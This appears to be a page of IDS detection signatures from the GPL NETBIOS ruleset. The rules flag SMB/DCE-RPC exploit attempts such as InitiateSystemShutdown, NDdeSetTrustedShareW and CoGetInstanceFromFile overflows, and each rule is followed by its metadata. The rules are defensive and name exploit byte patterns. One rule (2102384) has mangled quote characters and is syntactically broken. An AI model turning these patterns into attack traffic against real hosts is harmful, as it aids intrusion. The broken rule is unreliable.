Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-user

URL reference : bugtraq,5205|cve,2002-0642|nessus,10642|url,www.microsoft.com/technet/security/bulletin/MS02-034

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103183

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103183; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103021

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode andx oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; isdataat:4,relative; byte_test:4,>,1024,40,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103021; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode andx oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102999

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; within:1; distance:4; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102999; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102998

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown unicode andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102998; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102997

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102997; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102996

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102996; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102995

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102995; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102994

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown unicode andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102994; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102993

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102993; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102992

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102992; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102991

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102991; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102964

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102964; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102965

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102965; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102966

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102966; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102967

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102967; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102384

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NTLMSSP invalid mechlistMIC attempt"; flow:to_server,established; content:"|FF|SMBs"; depth:5; offset:4; nocase; content:"«; depth:1; offset:63; content:»|00 00 00|b|06 83 00 00 06|+|06 01 05 05 02|»; within:15; distance:1; content:»|06 0A|+|06 01 04 01 82|7|02 02 0A|»; distance:0; content:»|A3|>0<|A0|0″; distance:0; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12054; reference:nessus,12065; classtype:attempted-dos; sid:2102384; rev:11; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB NTLMSSP invalid mechlistMIC attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-dos

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12054|nessus,12065

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 11

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102401

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Session Setup AndX request username overflow attempt"; flow:to_server,established; content:"|00|"; depth:1; byte_test:2,>,322,2; content:"|FF|SMBs"; depth:5; offset:4; nocase; byte_test:1,<,128,6,relative; content:"|00 00 00 00|"; within:4; distance:42; byte_test:2,>,255,8,relative,little; content:!"|00|"; within:255; distance:10; reference:bugtraq,9752; reference:url,www.eeye.com/html/Research/Advisories/AD20040226.html; classtype:attempted-admin; sid:2102401; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Session Setup AndX request username overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,9752|url,www.eeye.com/html/Research/Advisories/AD20040226.html

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102960

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102960; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102956

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|nddeapi|00|"; within:9; distance:51; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102956; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102961

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi unicode andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102961; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102957

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi unicode andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C 00|n|00|d|00|d|00|e|00|a|00|p|00|i|00 00 00|"; within:18; distance:51; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102957; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi unicode andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102988

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102988; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102984

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|winreg|00|"; within:8; distance:51; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102984; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102989

